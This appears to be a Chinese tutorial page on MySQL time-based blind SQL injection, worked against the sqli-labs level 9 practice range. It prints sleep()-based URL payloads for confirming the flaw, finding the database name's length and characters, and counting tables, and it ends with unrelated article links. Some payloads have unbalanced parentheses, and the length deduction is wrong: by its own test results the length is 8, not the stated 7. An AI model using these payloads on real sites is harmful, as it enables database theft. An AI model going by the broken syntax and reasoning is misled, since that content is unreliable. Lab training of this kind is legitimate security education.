百度360必应搜狗淘宝本站头条
mysql distinctjenkins官网mysql 子查询vba splitpython list sort
当前位置:网站首页 > IT技术 > 正文

黑客小白的进阶之路——SQL注入之MySQL时间注入

wptr33 2025-06-28 17:12 20 浏览

MySQL时间盲注

课前小问题

如果说uniom注入用不了,布尔盲注也用不了,无论你插入到什么样的sql语句,它的页面都没有反应,这个时候该怎么办呢?

这个时候我们就可以去用到时间盲注了。

那什么是时间盲注呢?

时间盲注:当布尔型注入没有结果(页面显示正常)的时候,我们很难去判断注入的代码是否被执行,也可以说到底这个注入点存不存在,这个时候布尔型注入就无法发挥自己的作用,基于时间的盲注就出现了,所谓基于时间的盲注,就是根据web页面响应的时间差来判断该页面是否存在sql注入点。

使用场景

1.union注入用不了,布尔注入也用不了。

演示:sqli-labs 靶场第9关

这里一直没反应,那我们这个时候就要用时间盲注了

时间盲注操作方式

A.先去判断是否存在注入

B.在去判断注入类型:字符型/数字型/搜索型。

Sleep函数,我们怎么通过sleep函数来判断呢?既然它是一个时间盲注会根据这个页面的一个时间差来去判断。


延迟5秒响应,因为and左边要满足右边也要满足,那么我们就去执行一把,存在注入,必然这也响应5秒,如果不响应慢5秒的话,那么它就不可能存在注入。

C.判断能使用的注入方式,这里不能使用union注入\布尔盲注

?id=1'and 1=1 %23  页面会显正常
?id=1'and 1=2 %23  页面会显示不正常?id=1'and sleep(5)%23发现页面延迟了5秒钟响应证明sleep被带入数据库做了查询。所以是存在时间盲注的。 

D.首先获取数据库名称的长度

?id=1'and if ((length(database())>7)),sleep(5),1)%23 延时5秒
?id=1'and if ((length(database())>8)),sleep(5),1)%23 不延时5秒


说明数据库名称长度为7位

E.获取数据库的名称

?id=1'and if ((ascii(substr(database(),1,1))>n),sleep(5),1)%23

大于114,不大于115,说明当前使用的数据库名称第一位的ascii值为115,所以查看ASCII表得为字符s

F.获取表数量

?id=1'and if ((select count(*)from information_schema.tables where table_schema=database())>4,sleep(5),1)--+延迟5秒

?id=1'and if ((select count(*)from information_schema.tables where table_schema=database())>5,sleep(5),1)--+不延迟5秒

G.获取后面替换expr1就行了,依次寻找名字、字段...

相关推荐

什么是Java中的继承?如何实现继承?

什么是继承?...

Java 继承与多态:从基础到实战的深度解析

在面向对象编程(OOP)的三大支柱中,继承与多态是构建灵活、可复用代码的核心。无论是日常开发还是框架设计,这两个概念都扮演着至关重要的角色。本文将从基础概念出发,结合实例与图解,带你彻底搞懂Java...

Java基础教程:Java继承概述_java的继承

继承概述假如我们要定义如下类:学生类,老师类和工人类,分析如下。学生类属性:姓名,年龄行为:吃饭,睡觉老师类属性:姓名,年龄,薪水行为:吃饭,睡觉,教书班主任属性:姓名,年龄,薪水行为:吃饭,睡觉,管...

java4个技巧:从继承和覆盖,到最终的类和方法

日复一日,我们编写的大多数Java只使用了该语言全套功能的一小部分。我们实例化的每个流以及我们在实例变量前面加上的每个@Autowired注解都足以完成我们的大部分目标。然而,有些时候,我们必须求助于...

java:举例说明继承的概念_java继承的理解

在现实生活中,继承一般指的是子女继承父辈的财产。在程序中,继承描述的是事物之间的所属关系,通过继承可以使多种事物之间形成一种关系体系。例如猫和狗都属于动物,程序中便可以描述为猫和狗继承自动物,同理,...

从零开始构建一款开源的 Vibe Coding 产品 Week1Day4:业界调研之 Agent 横向对比

前情回顾前面两天我们重点调研了了一下Cursor的原理和Cursor中一个关键的工具edit_file的实现,但是其他CodingAgent也需要稍微摸一下底,看看有没有优秀之处,下...

学会这几个插件,让你的Notepad++使用起来更丝滑

搞程序开发的小伙伴相信对Notepad++都不会陌生,是一个占用空间少、打开启动快的文件编辑器,很多程序员喜欢使用Notepad++进行纯文本编辑或者脚本开发,但是Notepad++的功能绝不止于此,...

将 node_modules 目录放入 Git 仓库的优点

推荐一篇文章Whyyoushouldcheck-inyournodedependencies[1]...

再度加码AI编程,腾讯发布AI CLI并宣布CodeBuddy IDE开启公测

“再熬一年,90%的程序员可能再也用不着写for循环。”凌晨两点半,王工还在公司敲键盘。他手里那份需求文档写了足足六页,产品经理反复改了三次。放在过去,光数据库建表、接口对接、单元测试就得写两三天。现...

git 如何查看stash的内容_git查看ssh key

1.查看Stash列表首先,使用gitstashlist查看所有已保存的stash:...

6万星+ Git命令懒人必备!lazygit 终端UI神器,效率翻倍超顺手!

项目概览lazygit是一个基于终端的Git命令可视化工具,通过简易的TUI(文本用户界面)提升Git操作效率。开发者无需记忆复杂命令,即可完成分支管理、提交、合并等操作。...

《Gemini CLI 实战系列》(一)Gemini CLI 入门:AI 上命令行的第一步

谷歌的Gemini模型最近热度很高,而它的...

deepin IDE新版发布:支持玲珑构建、增强AI智能化

IT之家8月7日消息,深度操作系统官方公众号昨日(8月6日)发布博文,更新推出新版deepin集成开发环境(IDE),重点支持玲珑构建。支持玲珑构建deepinIDE在本次重磅更...

狂揽82.7k的star,这款开源可视化神器,轻松创建流程图和图表

再不用Mermaid,你的技术文档可能已经在悄悄“腐烂”——图表版本对不上、同事改完没同步、评审会上被一句“这图哪来的”问得哑口无言。这不是危言耸听。GitHub2025年开发者报告显示,63%的新仓...

《Gemini CLI 实战系列》(五)打造专属命令行工具箱

在前几篇文章中,我们介绍了GeminiCLI的基础用法、效率提升、文件处理和与外部工具结合。今天我们进入第五篇...

一周热门
最近发表
标签列表
赣ICP备2024040476号-12